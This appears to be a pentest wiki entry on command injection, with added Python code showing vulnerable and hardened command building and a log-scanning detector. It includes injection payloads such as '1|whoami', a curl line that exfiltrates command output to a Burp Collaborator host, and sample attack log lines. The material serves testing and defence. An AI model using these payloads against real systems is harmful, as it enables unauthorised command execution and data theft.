Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Command Injection

POC

We can inject some special characters to see whether the application blocks anything that could be used for command injection:

  • &
  • ;
  • Newline (0x0a or \n)
  • &&
  • |
  • ||

If the application doesn't throw any error messages, we can try injecting a command after one of these delimiters.

https://vulnerable-website/endpoint?parameter=1|whoami

Observe whether the parameter passes the injected command to the shell. When there is no visible output, an out-of-band callback confirms execution:

http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/

Note: this is a broad concept; the payloads above are only examples.
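To make the root cause and the fix concrete, here is an added example (not code from the Cobalt wiki) showing the vulnerable pattern beside its hardened form. The `ping` handler, the `host` parameter name and the allow-list pattern are assumptions for illustration; the delimiter list is the one given above.

```python
import re
import subprocess
from typing import List

# Delimiters named in the entry above. Any of them inside a value that is
# spliced into a shell command string lets the caller end the intended
# command and start another one.
SHELL_DELIMITERS = ("&&", "||", "&", ";", "|", "\n")

# Strict allow-list for a hypothetical "host" parameter: hostname labels or
# an IPv4 literal. The first character must be alphanumeric, which also
# rules out values that ping would read as an option (argument injection).
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def find_delimiters(value: str) -> List[str]:
    """Return the delimiters from the list above that appear in value."""
    return [d for d in SHELL_DELIMITERS if d in value]


def is_valid_host(host: str) -> bool:
    """True only if host matches the allow-list exactly."""
    return HOST_RE.fullmatch(host) is not None


def build_ping_vulnerable(host: str) -> str:
    """The 'before' pattern: user input concatenated into a shell string.

    A web handler would hand this string to subprocess.run(cmd, shell=True).
    It is returned, not executed, so the reader can see the injected text
    survive intact and reach the shell parser.
    """
    return f"ping -c 1 {host}"


def build_ping_safe(host: str) -> List[str]:
    """The hardened pattern: validate against the allow-list, then build an
    argv list. subprocess.run(argv) with the default shell=False passes the
    value to ping as a single argument; no shell ever parses it.
    """
    if not is_valid_host(host):
        raise ValueError(f"host rejected by allow-list: {host!r}")
    return ["ping", "-c", "1", host]


def run_safe(host: str) -> "subprocess.CompletedProcess[str]":
    """Execute the validated argv without a shell (not exercised by the test)."""
    return subprocess.run(
        build_ping_safe(host), capture_output=True, text=True, timeout=5
    )


if __name__ == "__main__":
    # Constructed value mirroring the PoC above; nothing here is executed.
    supplied = "1|whoami"
    print("delimiters found:", find_delimiters(supplied))
    print("vulnerable command string:", build_ping_vulnerable(supplied))
    try:
        build_ping_safe(supplied)
    except ValueError as exc:
        print("hardened builder refused:", exc)
    print("hardened argv:", build_ping_safe("example.com"))
```

The allow-list is the real control; the delimiter scan is only useful as a logging signal, because an allow-list rejects unknown characters without having to enumerate every shell feature.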

The most common parameters to consider while testing for command injection are:

  • cmd
  • exec
  • command
  • execute
  • ping
  • query
  • jump
  • code
  • reg
  • do
  • func
  • arg
  • option
  • load
  • process
  • step
  • read
  • function
  • req
  • feature
  • exe
  • module
  • payload
  • run
  • print
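The same two lists (delimiters and parameter names) drive a simple detection check on the server side. The following is an added example, not part of the Cobalt wiki: it parses constructed access-log lines in Common Log Format, URL-decodes each query parameter, and reports any parameter from the list above whose value contains one of the delimiters. The log lines, IPs and paths are made up for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Parameter names listed in the entry above (lower-cased for matching).
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run", "print",
}

# Delimiters from the PoC section above.
SHELL_DELIMITERS = ("&&", "||", "&", ";", "|", "\n")

# Common Log Format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic). A raw '&' in a query string is a
# parameter separator, so an injected ampersand only reaches the value when
# it arrives URL-encoded as %26; %7C is '|', %3B is ';', %0a is a newline.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /endpoint?parameter=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /endpoint?cmd=1%7Cwhoami HTTP/1.1" 200 640
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /tools?ping=127.0.0.1%3Bid HTTP/1.1" 500 221
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /tools?ping=127.0.0.1%0aid HTTP/1.1" 500 221
192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "GET /search?query=cats%20%26%20dogs HTTP/1.1" 200 998
"""


def inspect_target(target: str) -> List[Dict[str, object]]:
    """Decode the query string of one request target and return every
    suspect parameter whose value contains a shell delimiter."""
    hits: List[Dict[str, object]] = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in SUSPECT_PARAMS:
            continue
        found = [d for d in SHELL_DELIMITERS if d in value]
        if found:
            hits.append({"param": name, "value": value, "delimiters": found})
    return hits


def scan_log(text: str) -> List[Dict[str, object]]:
    """Run inspect_target over each parsable log line; attach client and status."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        for hit in inspect_target(match["target"]):
            findings.append({"ip": match["ip"], "status": match["status"], **hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The last sample line ("cats & dogs" in a search box) is flagged as well: a delimiter hit in a free-text parameter is a signal to triage, not proof of an attack, so this kind of rule belongs in a review queue rather than an automatic block. The two `ping` hits with status 500 are the ones worth correlating with process-creation telemetry on the host.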

Impact

High

Likelihood

High